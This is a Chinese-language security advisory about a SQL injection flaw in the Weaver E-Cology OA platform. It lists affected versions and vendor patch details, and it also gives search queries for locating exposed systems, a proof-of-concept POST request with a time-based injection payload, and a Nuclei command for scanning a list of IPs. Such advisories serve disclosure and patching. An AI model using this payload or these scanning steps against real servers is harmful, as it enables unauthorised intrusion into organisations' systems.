泛微E-Cology系统SQL注入漏洞预警

前言：

泛微协同管理应用平台E-Cology是一套功能丰富的企业协同管理平台，集成了企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理和数据中心等功能。

一、漏洞影响范围：

• Ecology 9.x 补丁版本 < 10.58.0
• Ecology 8.x 补丁版本 < 10.58.0

二、搜索语法：

• app.name=”泛微 E-Cology 9.0 OA”
• app.name=”泛微 E-Cology OA”

三、POC特征：

通过以下请求可触发漏洞：

<code>POST //weaver/weaver.file.FileDownloadForOutDoc fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1</code>

目前漏扫工具Nuclei也公布了相关POC模板：

https://github.com/UltimateSec/ultimaste-nuclei-templates/tree/main/ecology-oa

四、漏洞复现：

使用Nuclei进行扫描：

<code>nuclei -t .\pocs\ecology-oa-filedownloadforoutdoc-sqli.yaml -l .\ip.txt -o vulns.txt</code>

五、修复方式：

官方已发布安全补丁，建议受影响用户尽快升级至10.58及以上版本。

https://www.weaver.com.cn/cs/securityDownload.asp